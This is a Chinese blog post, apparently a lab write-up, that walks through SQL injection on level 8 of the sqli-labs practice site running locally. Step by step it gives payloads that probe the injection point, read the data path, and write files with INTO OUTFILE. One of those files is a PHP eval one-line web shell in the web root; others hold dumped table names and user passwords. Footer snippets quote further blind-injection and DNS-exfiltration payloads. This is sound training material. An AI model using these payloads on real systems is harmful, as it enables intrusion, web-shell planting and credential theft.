sqil-labs第八关实验

于 2024-06-14 17:14:49 发布
阅读量630 收藏 8
点赞数 12
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79931281/article/details/139686071
版权

Sql注入

  • Sqli-labs闯关less-8(布尔盲注)

IP:192.168.1.120

盲注是SQL注入的一种,之所以成为盲注是因为他不会根据SQL注入的攻击语句返回你想要知道的错误信息。

步骤一: 打开phpstudy启动,在浏览器上方搜索栏中输入网络环回口(网络环回口:192.168.1.120)加端口号7777 如图:

步骤二:查看分析源码(调出less-8源码:在PHPstudy中其他菜单/网站根目录/sqli-labs-master/less-8/index.php)如图:

步骤三:构建payload ?id=1’尝试单引号,可以通过URL地址栏直接看出不同,正确的结果就是不显示。如图:

步骤四:查看当前的字段分组?id=1’ order by 4 --+ 如图:

4显示错误,向下来猜选?id=1’ order by 3 --+

3返回路径You are in……正确路径,说明第四关有3个分组

步骤五:获取数据路径

有源代码可知本实验界面没有回显位,可通过其他实验页面查看文件路径

构建payload: ?id=0’ union select 1,2,@@datadir --+

使用less-2实验查看文件路径?id=0 union select 1,2,@@datadir 如图:

总结@@datadir可以推断出网站的绝对路径为D:\phpStudy\PHPTutotial\WWW\

步骤六:读写权限测试

构建payload:?id=1’ and (select count(*)from mysql.user)>0 --+如下图:

返回正常则有读写权限

步骤七:提升权限

解决方法:找到PHPstudy打开配置文件mysql-Lin文件,在其中添加代码:secure file priv=”/”,重启phpmysql生效

步骤八:使用into outfile函数构建payload

构建Payload:?id=1’ union select 1,2,3 into outfile

“D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-8\\1.txt” --+

如有图中显示错误,可以直接在浏览器或后台中可以看到1.txt文件已经生成了。如下图:

步骤九:构建一句话密码

构建payload:?id=0’ union select 1,2,’<?php @eval($_POST[“admin”])?>’ inot oufile “D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-8\\1.php” --+ 如下图:

对文件进行导入导出首先得要有足够的权限,但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null)secure_file_priy 参数是用来限制LOAD DATA,SELECT… OUTFLE,and LOAD-FILE()传到那个指定目录的。

步骤十:导出数据库名

构建payload:?id=0’ union select 1,user(),database() into outfile

“D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-8\\2.txt” --+ 如下图:

步骤十一:导出表名

构建payload:?id=0’ union select 1,2,table_name from information_schema.tables where table_schema=’securit’ into outfile

“D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-8\\3.txt” --+ 如下图:

步骤十二:导出列表

构建payload:?id=0’ union select 1,2,column_name from information_schema.columns where table_schema=’security’ and table_name =’users’ into outfile

“D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-8\\4.txt” --+ 如下图:

步骤十三:导出数据

构建payload:?id=0’ union select 1,username,password from users into outfile “D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-8\\5.txt” --+ 如下图:

完成!

果冻女孩.
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Sqli-labs靶场第8详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1078
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
sqli-labs靶场8(布尔盲注)
qq_46527080的博客
12-12 2235
知识点 函数 ascii()函数 将某个字符串转化为ascii值(webRobot转换工具) ord()函数 将某个字符串转化为ascii值 length()函数 返回字段/结果/函数的长度,length(column_name) length(database()) 即返回当前数据库名长度 substr()函数 截取字符段长度 例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a substr(abcd,2
sqli-labs卡8(基于get提交的单引号闭合的布尔盲注)通思路
zyh1588的博客
10-29 582
小白对sqli-labs靶场第八布尔盲注的理解
sqli.labs靶场(8-17
喜欢创作各种技术类文章,希望可以帮到你
01-28 796
爆users表字段名:id=1%27%20and%20if(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
最新发布
Superstacks超全栈
06-09 494
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
DI-engine 是一种广义的决策智能引擎,旨在标准化不同的决策智能环境和应用 还支持各种训练管道和定制的决策 AI 应用程序
11-11
模仿学习算法(BC/IRL/GAIL),如GAIL、SQIL、引导成本学习、隐式行为克隆。HER、RND、ICM、NGU等探索算法。离线RL算法:CQL、TD3BC、Decision Transformer。基于模型的 RL 算法:SVG、MVE、STEVE / MBPO、DDPPO。DI...
sqli-labs第8 附爆破代码
weixin_73688004的博客
03-31 267
得到表名字后,修改python程序的最后一行,想得到什么表的字段,就在GetColumns()里面填入表名字。重写后代码仅75行,利用率提高。
sqli-labs:第八
J_linnb的博客
05-02 768
使用二分法查找,小于110时不存在,小于120时存在,然后依次查找当猜到115时正常。由于得知数据库结果,根据前几可得知,第四个表是我们想要的,猜解第四个表长度。依次猜解第二个、三个...到第八个字母,最终为'security'猜测是闭了报错,根据正确和错误的回显不同,可以使用布尔盲注。根据之前二分法,得知表名为第一个值为117对应的为'u'猜解到8时正常显示,判断数据库名长度为8。猜解到5正常回显,因此第四个表长度为5。等于115时正常,第一个字母为's'以此类推,最后表名为'users'
sqli-labs 第八 较详细通解释】
m0_71635484的博客
02-17 890
sqli-labs第八详解
sqli-labs第八-布尔注入
weixin_51706044的博客
03-30 4178
文章目录布尔注入一、第八爆数据库名判断长度爆破数据库名二、使用步骤总结 布尔注入 如果页面既没有显示位,也没有报错提示的话,可以使用布尔注入. 通过插入一些语句查看结果来判断是否存在布尔注入. 布尔注入的几个常用函数 函数使用: length(select database())>5 #length()里可以放查询语句,用来判断查询结果的长度 exists( ) #exists()里可以放查询语句,用来判断查询结果是否存在 ascii( ) #ascii()里可以放查询.
Python面试题大全SQLi第八Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 322
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
SQLi第八Sqli-labs Less-8,sqlibals less8
m0_61408947的博客
04-12 766
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费。
sqli-labs第8(布尔盲注)
weixin_45626840的博客
04-25 1426
概念: 布尔盲注:页面回显信息只有“真”与“假”两种状态,通过将猜测的值与ASCII码比较返回真假值进验证。 步骤: 1.求闭合字符 2.求当前数据库名的长度 3.求当前数据库名的ASCII值 4.求表的数量 5.求表名的长度 6.求表名对应的ASCII值 7.求列的数量 8.求列名的长度 9求列名对应的ASCII值 10.求字段数量 11.求字段长度 12.求字段对应ASCII值 思路: 1、判断注入点: 2、求库名长度------id=1’ and length(database())=8 --+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs 第八 多命通攻略(Python3 自动化实现布尔盲注)
两个月亮
01-09 708
在使用了这两种对布尔盲注的实现后,相信各位都感觉到了采用了二分查找算法的 Python 实现相比于普通的 Python 实现速度有很大的提升吧,这种执行速度上的差异会随着被判断字符串的长度而变得更为明显。在转换过程中,MySQL 将对字符串的每一个字符从左往右进行扫描,一旦遇到非数字的字符将停止继续扫描(如果字符串的第一个字符为非数字字符,则将该字符串转换为数值的结果为。),我们先对数据库的名称的长度位数进行判断,相信数据库名称的长度的位数是不可能超过。让我们构造语句来判断数据库名称的第一个字符是否为。
sqli-labs第八(布尔盲注)
qq_42266432的博客
08-19 1276
第八看标题可知此可以使用布尔盲注,布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-labs靶场第八
gou1791241251的博客
12-26 1694
开始第八,传入id参数看看吧! 第一步:判断注入类型 传入单引号的时候页面显示异常了,说明闭合方式是含有单引号的! 通过使用and 1=1 和and 1=2的状态来判断是否是单引号闭合吧 显然此时是单引号闭合,有布尔类型状态。使用布尔盲注 第二步:判断有多少个字段,使用order by 一共有三个字段 以下便是通过布尔盲注来获取数据库信息的操作了,可以参考sqli-labs第六 ...
python编写exp破sqli-labs第8
u013930899的博客
05-22 426
在打sqli-labs卡时,手工用来验证可以,但全部搂出数据有些吃力了,可以使用burp suite或者编写自动化工具进行。 本文是用python编写的自动化工具打第8,详细代码如下。 备注:本文是用docker搭建的sqli-labs,代码中仅作为实现功能的逻辑,并未做符合python代码规范和标准书写。 import requests import string from test.request_s import ascii # ascii码...
dnslog带出——sqli-labs第8
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-04 1684
得到一个随机的子域名 库名 http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",database(),".uifm3e.dnslog.cn\\xxx.txt"))--+ 表名 http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') f.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值